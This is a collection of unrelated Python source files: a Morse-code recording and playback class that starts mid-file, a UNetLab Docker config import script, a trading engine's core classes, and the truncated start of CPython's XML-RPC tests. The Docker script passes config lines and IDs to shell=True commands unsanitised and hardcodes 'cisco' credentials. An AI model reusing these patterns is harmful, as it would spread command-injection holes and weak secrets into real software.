Set the target file path to record to.
"""
self.__target_file_path = target_file_path
@property
def station_id(self) -> str:
"""
The Station ID.
"""
return self.__recorder_station_id
@station_id.setter
def station_id(self, station_id: str):
"""
Set the Station ID.
"""
self.__recorder_station_id = station_id
@property
def wire(self) -> int:
"""
The Wire.
"""
return self.__recorder_wire
@wire.setter
def wire(self, wire: int):
"""
Set the recorder Wire.
"""
self.__recorder_wire = wire
def record(self, code, source, text=''):
"""
Record a code sequence in JSON format with additional context information.
"""
if self.__playback_state == PlaybackState.idle: # Only record if not playing back a recording
timestamp = get_timestamp()
data = {
"ts":timestamp,
"w":self.wire,
"s":self.station_id,
"o":source,
"t":text,
"c":code
}
with open(self.__target_file_path, "a+") as fp:
json.dump(data, fp)
fp.write('\n')
def playback_move_seconds(self, seconds: int):
"""
Change the current playback position forward/backward 'seconds' seconds.
A recording must be playing or this method does nothing.
"""
# ###
# This calculates a new file position using the current line number being played
# and using the index to find the position to move forward or backward based on
# the requested change and the timestamps in the index.
#
# The movement will be => than the request based on the timestamps for the lines
# in the recording.
#
# This is done using the file-operation lock so the playback can't change while
# the position is being changed. By using the index, this method doesn't take
# long to change the position. Since the playback is going to change anyway,
# the pause doesn't really matter.
# ###
if seconds == 0:
return
with self.__p_fileop_lock: # Lock out any other file access first
if self.__p_fp:
current_lineno = self.__p_line_no
indexlen = len(self.__p_fpts_index)
if current_lineno > 0 and current_lineno < indexlen - 1:
current_ts = self.__p_fpts_index[current_lineno][0]
current_pos = self.__p_fpts_index[current_lineno][1]
target_ts = current_ts + (seconds * 1000) # Calculate the target timestamp
nts = current_ts
new_pos = current_pos
# Move forward or backward?
if seconds > 0:
# Forward...
for i in range(current_lineno, indexlen - 1):
nts = self.__p_fpts_index[i][0]
if nts >= target_ts or i == indexlen - 1:
# If we move one line and the timestamp is >= target, we are done
new_pos = self.__p_fpts_index[i][1] # An index entry is [ts,fpos,station-change]
print(" Move forward to line: {} From: {} Pos: {} From: {} Timestamp: {} From: {}".format(\
i, current_lineno, new_pos, current_pos, nts, current_ts))
self.__p_line_no = i
self.__p_fp.seek(new_pos)
self.__p_pblts = nts # set last timestamp to the new timestamp so there isn't a delay when played
break
else:
# Backward...
for i in range(current_lineno, 0, -1):
nts = self.__p_fpts_index[i][0]
if nts <= target_ts or i == 0:
# If we move one line and the timestamp is <= target, we are done
new_pos = self.__p_fpts_index[i][1] # An index entry is [ts,fpos,station-change]
print(" Move backward to line: {} From: {} Pos: {} From: {} Timestamp: {} From: {}".format(\
i, current_lineno, new_pos, current_pos, nts, current_ts))
self.__p_line_no = i
self.__p_fp.seek(new_pos)
self.__p_pblts = nts # set last timestamp to the new timestamp so there isn't a delay when played
break
def playback_move_to_sender_begin(self):
"""
Change the current playback position back to the beginning of the
current sender.
A recording must be playing or this method does nothing.
"""
# ###
# This calculates a new file position using the current line number being played
# and using the index to find the position to move backward to based on
# the sender/station change flag in the index.
#
# This is done using the file-operation lock so the playback can't change while
# the position is being changed. By using the index, this method doesn't take
# long to change the position. Since the playback is going to change anyway,
# the pause doesn't really matter.
# ###
with self.__p_fileop_lock: # Lock out any other file access first
if self.__p_fp:
current_lineno = self.__p_line_no
indexlen = len(self.__p_fpts_index)
if current_lineno > 0 and current_lineno < indexlen - 1:
current_ts = self.__p_fpts_index[current_lineno][0]
current_pos = self.__p_fpts_index[current_lineno][1]
# Move back through the index checking for a station change
for i in range(current_lineno, 0, -1):
sc = self.__p_fpts_index[i][2] # An index entry is [ts,fpos,station-change]
if sc:
# We found a station change. Go back one more line if possible.
if i > 0:
i -= 1
new_pos = self.__p_fpts_index[i][1]
nts = self.__p_fpts_index[i][0]
print(" Move back to beginning of sender. Line: {} From: {} Pos: {} From: {} Timestamp: {} From: {}".format(\
i, current_lineno, new_pos, current_pos, nts, current_ts))
self.__p_line_no = i
self.__p_fp.seek(new_pos)
self.__p_pblts = nts # set last timestamp to the new timestamp so there isn't a delay when played
break
def playback_move_to_sender_end(self):
"""
Change the current playback position to the end of the
current sender.
A recording must be playing or this method does nothing.
"""
# ###
# This calculates a new file position using the current line number being played
# and using the index to find the position to move forward to based on
# the sender/station change flag in the index.
#
# This is done using the file-operation lock so the playback can't change while
# the position is being changed. By using the index, this method doesn't take
# long to change the position. Since the playback is going to change anyway,
# the pause doesn't really matter.
# ###
with self.__p_fileop_lock: # Lock out any other file access first
if self.__p_fp:
current_lineno = self.__p_line_no
indexlen = len(self.__p_fpts_index)
if current_lineno > 0 and current_lineno < indexlen - 1:
current_ts = self.__p_fpts_index[current_lineno][0]
current_pos = self.__p_fpts_index[current_lineno][1]
# Move forward through the index checking for a station change
for i in range(current_lineno, indexlen-1):
sc = self.__p_fpts_index[i][2] # An index entry is [ts,fpos,station-change]
if sc:
# We found a station change. Go back one line if possible.
if i > 0:
i -= 1
new_pos = self.__p_fpts_index[i][1]
nts = self.__p_fpts_index[i][0]
print(" Move forward to next sender. Line: {} From: {} Pos: {} From: {} Timestamp: {} From: {}".format(\
i, current_lineno, new_pos, current_pos, nts, current_ts))
self.__p_line_no = i
self.__p_fp.seek(new_pos)
self.__p_pblts = nts # set last timestamp to the new timestamp so there isn't a delay when played
break
def playback_resume(self):
"""
Resume a paused playback.
The `playback_start` method must have been called to set up the necessary state
and `playback_pause` must have been called to pause the current playback. Otherwise
this method does nothing.
"""
if self.__playback_state == PlaybackState.paused:
self.__playback_state = PlaybackState.playing
self.__playback_resume_flag.set()
def playback_pause(self):
"""
Pause a currently playing recording.
A recording must be playing or this method does nothing.
"""
if self.__playback_state == PlaybackState.playing:
self.__playback_resume_flag.clear()
self.__playback_state = PlaybackState.paused
def playback_pause_resume(self):
"""
Pause playback if playing, resume playback if paused.
This does nothing if there isn't a playback in progress.
"""
if self.__playback_state == PlaybackState.idle:
return
if self.__playback_state == PlaybackState.playing:
self.playback_pause()
else:
self.playback_resume()
def playback_stop(self):
"""
Stop playback and clear the playback state
"""
if self.__playback_thread:
pt = self.__playback_thread
self.__playback_thread = None
self.__playback_stop_flag.set()
self.__playback_resume_flag.set() # Set resume flag incase playback was paused
def playback_start(self, list_data=False, max_silence=0, speed_factor=100):
"""
Play a recording to the configured sounder.
"""
self.playback_stop()
self.__playback_resume_flag.clear()
self.__playback_stop_flag.clear()
self.__p_fts = -1
self.__p_lts = 0
self.__p_stations.clear()
self.__p_fpts_index = []
self.__p_line_no = 0
self.__p_lines = 0
self.__recorder_station_id = None
self.__recorder_wire = None
self.__list_data = list_data
self.__max_silence = max_silence
self.__speed_factor = speed_factor
#
# Get information from the current playback recording file.
with open(self.__source_file_path, "r") as fp:
self.__p_fpts_index.append((0,0,False)) # Store line 0 as Time=0, Pos=0, Sender-Change=False
previous_station = None
# NOTE: Can't iterate over the file lines as it disables `tell()` and `seek()`.
line = fp.readline()
while line:
try:
fpos = fp.tell()
data = json.loads(line)
ts = data['ts']
wire = data['w']
station = data['s']
ts = data['ts']
station = data['s']
# Store the file position and timestamp in the index to use
# for seeking to a line based on time or line number
self.__p_fpts_index.append((ts,fpos,station != previous_station))
previous_station = station
# Get the first and last timestamps from the recording
if self.__p_fts == -1 or ts < self.__p_fts:
self.__p_fts = ts # Set the 'first' timestamp
if self.__p_lts < ts:
self.__p_lts = ts
# Update the number of lines
self.__p_lines +=1
# Generate the station list from the recording
self.__p_stations.add(station)
# Read the next line
line = fp.readline()
except Exception as ex:
log.err("Error processing recording file: '{}' Line: {} Error: {}".format(self.__source_file_path, self.__p_line_no, ex))
return
# Calculate recording file values to aid playback functions
self.__playback_thread = threading.Thread(name='Recorder-Playback-Play', daemon=True, target=self.callbackPlay)
self.__playback_thread.start()
if self.__play_station_list_callback:
self.__p_stations_thread = threading.Thread(name='Recorder-Playback-StationList', daemon=True, target=self.callbackPlayStationList)
self.__p_stations_thread.start()
if self.__list_data:
# Print some values about the recording
print(" Lines: {} Start: {} End: {} Duration: {}".format(self.__p_lines, date_time_from_ts(self.__p_fts), date_time_from_ts(self.__p_lts), hms_from_ts(self.__p_lts, self.__p_fts)))
def callbackPlay(self):
"""
Called by the playback thread `run` to playback recorded code.
"""
self.__p_line_no = 0
self.__p_pblts = -1 # Keep the last timestamp
try:
if not self.source_file_path:
return
self.__playback_state = PlaybackState.playing
#
# With the information from the recording, call the station callback (if set)
if self.__list_data:
print('Stations in recording:')
for s in self.__p_stations:
if self.__list_data:
print(' Station: ', s)
if self.__play_station_list_callback:
self.__play_station_list_callback(s)
with open(self.__source_file_path, "r") as self.__p_fp:
with self.__p_fileop_lock:
# NOTE: Can't iterate over the file lines as it disables `tell()` and `seek()`.
line = self.__p_fp.readline()
self.__p_line_no += 1
while line:
# Get the file lock and read the contents of the line
with self.__p_fileop_lock:
while self.__playback_state == PlaybackState.paused:
self.__playback_resume_flag.wait() # Wait for playback to be resumed
self.__playback_state = PlaybackState.playing
if self.__playback_stop_flag.is_set():
# Playback stop was requested
self.__playback_state = PlaybackState.idle
self.__playback_resume_flag.clear()
return
data = json.loads(line)
#
code = data['c'] # Code sequence
ts = data['ts'] # Timestamp
wire = data['w'] # Wire number
station = data['s'] # Station ID
source = data['o'] # Source/Origin (numeric value from kob.CodeSource)
pblts = self.__p_pblts
self.__p_pblts = ts
# Done with lock
try:
if pblts < 0:
pblts = ts
if self.__list_data:
print(date_time_from_ts(ts), line, end='')
if code == []: # Ignore empty code packets
continue
codePause = -code[0] / 1000.0 # delay since end of previous code sequence and beginning of this one
# For short pauses (< 2 sec), `KOB.sounder` can handle them more precisely.
# However the way `KOB.sounder` handles longer pauses, although it makes sense for
# real-time transmissions, is flawed for playback. Better to handle long pauses here.
# A pause of 0x3777 ms is a special case indicating a discontinuity and requires special
# handling in `KOB.sounder`.
#
# Also check for station change code sequence. If so, pause for recorded timestamp difference
if self.__playback_state == PlaybackState.playing:
pause = 0
if codePause == 32.767 and len(code) > 1 and code[1] == 2:
# Probable sender change. See if it is...
if not station == self.__player_station_id:
if self.__list_data:
print("Sender change.")
pause = round((ts - pblts)/1000, 4)
elif codePause > 2.0 and codePause < 32.767:
# Long pause in sent code
pause = round((((ts - pblts)/1000) - 2.0), 4) # Subtract 2 seconds so kob has some to handle
code[0] = -2000 # Change pause in code sequence to 2 seconds since the rest is handled
if pause > 0:
# Long pause or a station/sender change.
# For very long delays, sleep a maximum of `max_silence` seconds
if self.__max_silence > 0 and pause > self.__max_silence:
if self.__list_data:
print("Realtime pause of {} seconds being reduced to {} seconds".format(pause, self.__max_silence))
pause = self.__max_silence
time.sleep(pause)
if not self.__speed_factor == 100:
sf = 1.0 / (self.__speed_factor / 100.0)
code[:] = [round(sf * c) if (c < 0 or c > 2) and c != -32767 else c for c in code]
self.wire = wire
if self.__play_wire_callback:
self.__play_wire_callback(wire)
self.__player_station_id = station
if self.__play_sender_id_callback:
self.__play_sender_id_callback(station)
if self.__play_code_callback:
self.__play_code_callback(code)
finally:
# Read the next line to be ready to continue the processing loop.
with self.__p_fileop_lock:
line = self.__p_fp.readline()
self.__p_line_no += 1
finally:
self.__playback_stop_flag.set()
self.__playback_state = PlaybackState.idle
if self.__play_finished_callback:
self.__play_finished_callback()
with self.__p_fileop_lock:
self.__p_fp = None
if self.__list_data:
print("Playback done.")
def callbackPlayStationList(self):
"""
Called by the station list thread run method to update a station list
via the registered callback. The station list is refreshed every 5 seconds.
"""
if not self.__play_station_list_callback:
return
while True:
for stn in self.__p_stations:
self.__play_station_list_callback(stn)
stop = self.__playback_stop_flag.wait(5.0) # Wait until 'stop' flag is set or 5 seconds
if stop:
return # Stop signalled - return from run method
"""
Test code
"""
if __name__ == "__main__":
# Self-test
from pykob import morse
test_target_filename = "test." + str(get_timestamp()) + ".json"
myRecorder = Recorder(test_target_filename, test_target_filename, station_id="Test Recorder", wire=-1)
mySender = morse.Sender(20)
# 'HI' at 20 wpm as a test
print("HI")
codesequence = (-1000, +2, -1000, +60, -60, +60, -60, +60, -60, +60,
-180, +60, -60, +60, -1000, +1)
myRecorder.record(codesequence, kob.CodeSource.local)
# Append more text to the same file
for c in "This is a test":
codesequence = mySender.encode(c, True)
myRecorder.record(codesequence, kob.CodeSource.local, c)
print()
# Play the file
myKOB = kob.KOB(port=None, audio=True)
myRecorder.playback(myKOB)
|
config_docker.py
|
#!/usr/bin/env python3
# scripts/config_docker.py
#
# Import/Export script for Docker.io.
#
# @author Andrea Dainese <andrea.dainese@gmail.com>
# @copyright 2014-2016 Andrea Dainese
# @license BSD-3-Clause https://github.com/dainok/unetlab/blob/master/LICENSE
# @link http://www.unetlab.com/
# @version 20160719
import getopt, multiprocessing, os, pexpect, re, subprocess, sys, time
username = 'cisco'
password = 'cisco'
secret = 'cisco'
conntimeout = 3 # Maximum time for console connection
expctimeout = 3 # Maximum time for each short expect
longtimeout = 30 # Maximum time for each long expect
timeout = 60 # Maximum run time (conntimeout is included)
def config_put(docker_pid, config):
for line in config.split(os.linesep):
m = re.match(r'^ip ', line, re.M|re.I)
if m:
# use nsenter for ip configuration
cmd = "/opt/unetlab/wrappers/nsenter -t %s -n %s" %(docker_pid, line)
p1 = subprocess.Popen([cmd], stdout=subprocess.PIPE, shell=True)
p1.wait()
if p1.returncode != 0:
print('ERROR: error executing "%s".' %(cmd))
return False
return True
def usage():
print('Usage: %s <standard options>' %(sys.argv[0]));
print('Standard Options:');
print('-a <s> *Action can be:')
print(' - get: get the startup-configuration and push it to a file')
print(' - put: put the file as startup-configuration')
print('-f <s> *File');
print('-i <n> *Docker instance ID');
print('-t <n> Timeout (default = %i)' %(timeout));
print('* Mandatory option')
def now():
# Return current UNIX time in milliseconds
return int(round(time.time() * 1000))
def main(action, fiename, docker_id):
try:
if action == 'put':
try:
fd = open(filename, 'r')
config = fd.read()
fd.close()
except:
print('ERROR: cannot read config from file.')
sys.exit(1)
p1 = subprocess.Popen(["/usr/bin/docker -H=tcp://127.0.0.1:4243 inspect --format '{{ .State.Pid }}' %s" %(docker_id)], stdout=subprocess.PIPE, shell=True)
p1.wait()
output, error = p1.communicate()
docker_pid = output.decode("utf-8").rstrip()
rc = config_put(docker_pid, config)
if rc != True:
print('ERROR: failed to push config.')
sys.exit(1)
# Remove lock file
lock = '%s/.lock' %(os.path.dirname(filename))
if os.path.exists(lock):
os.remove(lock)
# Mark as configured
configured = '%s/.configured' %(os.path.dirname(filename))
if not os.path.exists(configured):
open(configured, 'a').close()
sys.exit(0)
except Exception as e:
print('ERROR: got an exception')
print(type(e)) # the exception instance
print(e.args) # arguments stored in .args
print(e) # __str__ allows args to be printed directly,
return False
if __name__ == "__main__":
action = None
filename = None
port = None
# Getting parameters from command line
try:
opts, args = getopt.getopt(sys.argv[1:], 'a:i:t:f:', ['action=', 'port=', 'timeout=', 'file='])
except getopt.GetoptError as e:
usage()
sys.exit(3)
for o, a in opts:
if o in ('-a', '--action'):
action = a
elif o in ('-f', '--file'):
filename = a
elif o in ('-i', '--id'):
docker_id = a
elif o in ('-t', '--timeout'):
try:
timeout = int(a)
except:
timeout = -1
else:
print('ERROR: invalid parameter.')
# Checking mandatory parameters
if action == None or docker_id == None or filename == None:
usage()
print('ERROR: missing mandatory parameters.')
sys.exit(1)
if action not in ['get', 'put']:
usage()
print('ERROR: invalid action.')
sys.exit(1)
if timeout < 0:
usage()
print('ERROR: timeout must be 0 or higher.')
sys.exit(1)
if action == 'get' and os.path.exists(filename):
usage()
print('ERROR: destination file already exists.')
sys.exit(1)
if action == 'put' and not os.path.exists(filename):
usage()
print('ERROR: source file does not already exist.')
sys.exit(1)
if action == 'put':
try:
fd = open(filename, 'r')
config = fd.read()
fd.close()
except:
usage()
print('ERROR: cannot read from file.')
sys.exit(1)
# Backgrounding the script
end_before = now() + timeout * 1000
p = multiprocessing.Process(target=main, name="Main", args=(action, filename, docker_id))
p.start()
while (p.is_alive() and now() < end_before):
# Waiting for the child process to end
time.sleep(1)
if p.is_alive():
# Timeout occurred
print('ERROR: timeout occurred.')
p.terminate()
sys.exit(127)
if p.exitcode != 0:
sys.exit(127)
sys.exit(0)
|
engine.py
|
"""
"""
import logging
import smtplib
import os
from abc import ABC
from datetime import datetime
from email.message import EmailMessage
from queue import Empty, Queue
from threading import Thread
from typing import Any, Sequence, Type
from cryptoquant.event import Event, EventEngine
from .app import BaseApp
from .event import (
EVENT_TICK,
EVENT_ORDER,
EVENT_TRADE,
EVENT_POSITION,
EVENT_ACCOUNT,
EVENT_CONTRACT,
EVENT_LOG
)
from .gateway import BaseGateway
from .object import (
CancelRequest,
LogData,
OrderRequest,
SubscribeRequest,
HistoryRequest
)
from .setting import SETTINGS
from .utility import get_folder_path, TRADER_DIR
class MainEngine:
"""
Acts as the core of VN Trader.
"""
def __init__(self, event_engine: EventEngine = None):
""""""
if event_engine:
self.event_engine = event_engine
else:
self.event_engine = EventEngine()
self.event_engine.start()
self.gateways = {}
self.engines = {}
self.apps = {}
self.exchanges = []
os.chdir(TRADER_DIR) # Change working directory
self.init_engines() # Initialize function engines
def add_engine(self, engine_class: Any):
"""
Add function engine.
"""
engine = engine_class(self, self.event_engine)
self.engines[engine.engine_name] = engine
return engine
def add_gateway(self, gateway_class: Type[BaseGateway]):
"""
Add gateway.
"""
gateway = gateway_class(self.event_engine)
self.gateways[gateway.gateway_name] = gateway
# Add gateway supported exchanges into engine
for exchange in gateway.exchanges:
if exchange not in self.exchanges:
self.exchanges.append(exchange)
return gateway
def add_app(self, app_class: Type[BaseApp]):
"""
Add app.
"""
app = app_class()
self.apps[app.app_name] = app
engine = self.add_engine(app.engine_class)
return engine
def init_engines(self):
"""
Init all engines.
"""
self.add_engine(LogEngine)
self.add_engine(OmsEngine)
self.add_engine(EmailEngine)
def write_log(self, msg: str, source: str = ""):
"""
Put log event with specific message.
"""
log = LogData(msg=msg, gateway_name=source)
event = Event(EVENT_LOG, log)
self.event_engine.put(event)
def get_gateway(self, gateway_name: str):
"""
Return gateway object by name.
"""
gateway = self.gateways.get(gateway_name, None)
if not gateway:
self.write_log(f"找不到底层接口:{gateway_name}")
return gateway
def get_engine(self, engine_name: str):
"""
Return engine object by name.
"""
engine = self.engines.get(engine_name, None)
if not engine:
self.write_log(f"找不到引擎:{engine_name}")
return engine
def get_default_setting(self, gateway_name: str):
"""
Get default setting dict of a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.get_default_setting()
return None
def get_all_gateway_names(self):
"""
Get all names of gatewasy added in main engine.
"""
return list(self.gateways.keys())
def get_all_apps(self):
"""
Get all app objects.
"""
return list(self.apps.values())
def get_all_exchanges(self):
"""
Get all exchanges.
"""
return self.exchanges
def connect(self, setting: dict, gateway_name: str):
"""
Start connection of a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.connect(setting)
def subscribe(self, req: SubscribeRequest, gateway_name: str):
"""
Subscribe tick data update of a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.subscribe(req)
def send_order(self, req: OrderRequest, gateway_name: str):
"""
Send new order request to a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.send_order(req)
else:
return ""
def cancel_order(self, req: CancelRequest, gateway_name: str):
"""
Send cancel order request to a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.cancel_order(req)
def send_orders(self, reqs: Sequence[OrderRequest], gateway_name: str):
"""
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.send_orders(reqs)
else:
return ["" for req in reqs]
def cancel_orders(self, reqs: Sequence[CancelRequest], gateway_name: str):
"""
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.cancel_orders(reqs)
def query_history(self, req: HistoryRequest, gateway_name: str):
"""
Send cancel order request to a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.query_history(req)
else:
return None
def close(self):
"""
Make sure every gateway and app is closed properly before
programme exit.
"""
# Stop event engine first to prevent new timer event.
self.event_engine.stop()
for engine in self.engines.values():
engine.close()
for gateway in self.gateways.values():
gateway.close()
class BaseEngine(ABC):
"""
Abstract class for implementing an function engine.
"""
def __init__(
self,
main_engine: MainEngine,
event_engine: EventEngine,
engine_name: str,
):
""""""
self.main_engine = main_engine
self.event_engine = event_engine
self.engine_name = engine_name
def close(self):
""""""
pass
class LogEngine(BaseEngine):
"""
Processes log event and output with logging module.
"""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(LogEngine, self).__init__(main_engine, event_engine, "log")
if not SETTINGS["log.active"]:
return
self.level = SETTINGS["log.level"]
self.logger = logging.getLogger("VN Trader")
self.logger.setLevel(self.level)
self.formatter = logging.Formatter(
"%(asctime)s %(levelname)s: %(message)s"
)
self.add_null_handler()
if SETTINGS["log.console"]:
self.add_console_handler()
if SETTINGS["log.file"]:
self.add_file_handler()
self.register_event()
def add_null_handler(self):
"""
Add null handler for logger.
"""
null_handler = logging.NullHandler()
self.logger.addHandler(null_handler)
def add_console_handler(self):
"""
Add console output of log.
"""
console_handler = logging.StreamHandler()
console_handler.setLevel(self.level)
console_handler.setFormatter(self.formatter)
self.logger.addHandler(console_handler)
def add_file_handler(self):
"""
Add file output of log.
"""
today_date = datetime.now().strftime("%Y%m%d")
filename = f"vt_{today_date}.log"
log_path = get_folder_path("log")
file_path = log_path.joinpath(filename)
file_handler = logging.FileHandler(
file_path, mode="a", encoding="utf8"
)
file_handler.setLevel(self.level)
file_handler.setFormatter(self.formatter)
self.logger.addHandler(file_handler)
def register_event(self):
""""""
print('log event register')
self.event_engine.register(EVENT_LOG, self.process_log_event)
def process_log_event(self, event: Event):
"""
Process log event.
"""
log = event.data
self.logger.log(log.level, log.msg)
class OmsEngine(BaseEngine):
"""
Provides order management system function for VN Trader.
"""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(OmsEngine, self).__init__(main_engine, event_engine, "oms")
self.ticks = {}
self.orders = {}
self.trades = {}
self.positions = {}
self.accounts = {}
self.contracts = {}
self.active_orders = {}
self.add_function()
self.register_event()
def add_function(self):
"""Add query function to main engine."""
self.main_engine.get_tick = self.get_tick
self.main_engine.get_order = self.get_order
self.main_engine.get_trade = self.get_trade
self.main_engine.get_position = self.get_position
self.main_engine.get_account = self.get_account
self.main_engine.get_contract = self.get_contract
self.main_engine.get_all_ticks = self.get_all_ticks
self.main_engine.get_all_orders = self.get_all_orders
self.main_engine.get_all_trades = self.get_all_trades
self.main_engine.get_all_positions = self.get_all_positions
self.main_engine.get_all_accounts = self.get_all_accounts
self.main_engine.get_all_contracts = self.get_all_contracts
self.main_engine.get_all_active_orders = self.get_all_active_orders
def register_event(self):
""""""
self.event_engine.register(EVENT_TICK, self.process_tick_event)
self.event_engine.register(EVENT_ORDER, self.process_order_event)
self.event_engine.register(EVENT_TRADE, self.process_trade_event)
self.event_engine.register(EVENT_POSITION, self.process_position_event)
self.event_engine.register(EVENT_ACCOUNT, self.process_account_event)
self.event_engine.register(EVENT_CONTRACT, self.process_contract_event)
def process_tick_event(self, event: Event):
""""""
tick = event.data
self.ticks[tick.vt_symbol] = tick
def process_order_event(self, event: Event):
""""""
order = event.data
self.orders[order.vt_orderid] = order
# If order is active, then update data in dict.
if order.is_active():
self.active_orders[order.vt_orderid] = order
# Otherwise, pop inactive order from in dict
elif order.vt_orderid in self.active_orders:
self.active_orders.pop(order.vt_orderid)
def process_trade_event(self, event: Event):
""""""
trade = event.data
self.trades[trade.vt_tradeid] = trade
def process_position_event(self, event: Event):
""""""
position = event.data
self.positions[position.vt_positionid] = position
def process_account_event(self, event: Event):
""""""
account = event.data
self.accounts[account.vt_accountid] = account
def process_contract_event(self, event: Event):
""""""
contract = event.data
self.contracts[contract.vt_symbol] = contract
def get_tick(self, vt_symbol):
"""
Get latest market tick data by vt_symbol.
"""
return self.ticks.get(vt_symbol, None)
def get_order(self, vt_orderid):
"""
Get latest order data by vt_orderid.
"""
return self.orders.get(vt_orderid, None)
def get_trade(self, vt_tradeid):
"""
Get trade data by vt_tradeid.
"""
return self.trades.get(vt_tradeid, None)
def get_position(self, vt_positionid):
"""
Get latest position data by vt_positionid.
"""
return self.positions.get(vt_positionid, None)
def get_account(self, vt_accountid):
"""
Get latest account data by vt_accountid.
"""
return self.accounts.get(vt_accountid, None)
def get_contract(self, vt_symbol):
"""
Get contract data by vt_symbol.
"""
return self.contracts.get(vt_symbol, None)
def get_all_ticks(self):
"""
Get all tick data.
"""
return list(self.ticks.values())
def get_all_orders(self):
"""
Get all order data.
"""
return list(self.orders.values())
def get_all_trades(self):
"""
Get all trade data.
"""
return list(self.trades.values())
def get_all_positions(self):
"""
Get all position data.
"""
return list(self.positions.values())
def get_all_accounts(self):
"""
Get all account data.
"""
return list(self.accounts.values())
def get_all_contracts(self):
"""
Get all contract data.
"""
return list(self.contracts.values())
def get_all_active_orders(self, vt_symbol: str = ""):
"""
Get all active orders by vt_symbol.
If vt_symbol is empty, return all active orders.
"""
if not vt_symbol:
return list(self.active_orders.values())
else:
active_orders = [
order
for order in self.active_orders.values()
if order.vt_symbol == vt_symbol
]
return active_orders
class EmailEngine(BaseEngine):
"""
Provides email sending function for VN Trader.
"""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(EmailEngine, self).__init__(main_engine, event_engine, "email")
self.thread = Thread(target=self.run)
self.queue = Queue()
self.active = False
self.main_engine.send_email = self.send_email
def send_email(self, subject: str, content: str, receiver: str = ""):
""""""
# Start email engine when sending first email.
if not self.active:
self.start()
# Use default receiver if not specified.
if not receiver:
receiver = SETTINGS["email.receiver"]
msg = EmailMessage()
msg["From"] = SETTINGS["email.sender"]
msg["To"] = SETTINGS["email.receiver"]
msg["Subject"] = subject
msg.set_content(content)
self.queue.put(msg)
def run(self):
""""""
while self.active:
try:
msg = self.queue.get(block=True, timeout=1)
with smtplib.SMTP_SSL(
SETTINGS["email.server"], SETTINGS["email.port"]
) as smtp:
smtp.login(
SETTINGS["email.username"], SETTINGS["email.password"]
)
smtp.send_message(msg)
except Empty:
pass
def start(self):
""""""
self.active = True
self.thread.start()
def close(self):
""""""
if not self.active:
return
self.active = False
self.thread.join()
|
test_xmlrpc.py
|
import base64
import datetime
import decimal
import sys
import time
import unittest
from unittest import mock
import xmlrpc.client as xmlrpclib
import xmlrpc.server
import http.client
import http, http.server
import socket
import threading
import re
import io
import contextlib
from test import support
from test.support import os_helper
from test.support import socket_helper
from test.support import threading_helper
from test.support import ALWAYS_EQ, LARGEST, SMALLEST
try:
import gzip
except ImportError:
gzip = None
alist = [{'astring': 'foo@bar.baz.spam',
'afloat': 7283.43,
'anint': 2**20,
'ashortlong': 2,
'anotherlist': ['.zyx.41'],
'abase64': xmlrpclib.Binary(b"my dog has fleas"),
'b64bytes': b"my dog has fleas",
'b64bytearray': bytearray(b"my dog has fleas"),
'boolean': False,
'unicode': '\u4000\u6000\u8000',
'ukey\u4000': 'regular value',
'datetime1': xmlrpclib.DateTime('20050210T11:41:23'),
'datetime2': xmlrpclib.DateTime(
(2005, 2, 10, 11, 41, 23, 0, 1, -1)),
'datetime3': xmlrpclib.DateTime(
datetime.datetime(2005, 2, 10, 11, 41, 23)),
}]
class XMLRPCTestCase(unittest.TestCase):
def test_dump_load(self):
dump = xmlrpclib.dumps((alist,))
load = xmlrpclib.loads(dump)
self.assertEqual(alist, load[0][0])
def test_dump_bare_datetime(self):
# This checks that an unwrapped datetime.date object can be handled
# by the marshalling code. This can't be done via test_dump_load()
# since with use_builtin_types set to 1 the unmarshaller would create
# datetime objects for the 'datetime[123]' keys as well
dt = datetime.datetime(2005, 2, 10, 11, 41, 23)
self.assertEqual(dt, xmlrpclib.DateTime('20050210T11:41:23'))
s = xmlrpclib.dumps((dt,))
result, m = xmlrpclib.loads(s, use_builtin_types=True)
(newdt,) = result
self.assertEqual(newdt, dt)
self.assertIs(type(newdt), datetime.datetime)
self.assertIsNone(m)
result, m = xmlrpclib.loads(s, use_builtin_types=False)
(newdt,) = result
self.assertEqual(newdt, dt)
self.assertIs(type(newdt), xmlrpclib.DateTime)
self.assertIsNone(m)
result, m = xmlrpclib.loads(s, use_datetime=True)
(newdt,) = result
self.assertEqual(newdt, dt)
self.assertIs(type(newdt), datetime.datetime)
self.assertIsNone(m)
result, m = xmlrpclib.loads(s, use_datetime=False)
(newdt,) = result
self.assertEqual(newdt, dt)
self.assertIs(type(newdt), xmlrpclib.DateTime)
self.assertIsNone(m)
def test_datetime_before_1900(self):
# same as before but with a date before 1900
dt = datetime.datetime(1, 2, 10, 11, 41, 23)
self.assertEqual(dt, xmlrpclib.DateTime('00010210T11:41:23'))
s = xmlrpclib.dumps((dt,))
result, m = xmlrpclib.loads(s, use_builtin_types=True)
(newdt,) = result
self.assertEqual(newdt, dt)
self.assertIs(type(newdt), datetime.datetime)
self.assertIsNone(m)
result, m = xmlrpclib.loads(s, use_builtin_types=False)
(newdt,) = result
self.assertEqual(newdt, dt)
self.assertIs(type(newdt), xmlrpclib.DateTime)
self.assertIsNone(m)
def test_bug_1164912 (self):
d = xmlrpclib.DateTime()
((new_d,), dummy) = xmlrpclib.loads(xmlrpclib.dumps((d,),
methodresponse=True))
self.assertIsInstance(new_d.value, str)
# Check that the output of dumps() is still an 8-bit string
s = xmlrpclib.dumps((new_d,), methodresponse=True)
self.assertIsInstance(s, str)
def test_newstyle_class(self):
class T(object):
pass
t = T()
t.x = 100
t.y = "Hello"
((t2,), dummy) = xmlrpclib.loads(xmlrpclib.dumps((t,)))
self.assertEqual(t2, t.__dict__)
def test_dump_big_long(self):
self.assertRaises(OverflowError, xmlrpclib.dumps, (2**99,))
def test_dump_bad_dict(self):
self.assertRaises(TypeError, xmlrpclib.dumps, ({(1,2,3): 1},))
def test_dump_recursive_seq(self):
l = [1,2,3]
t = [3,4,5,l]
l.append(t)
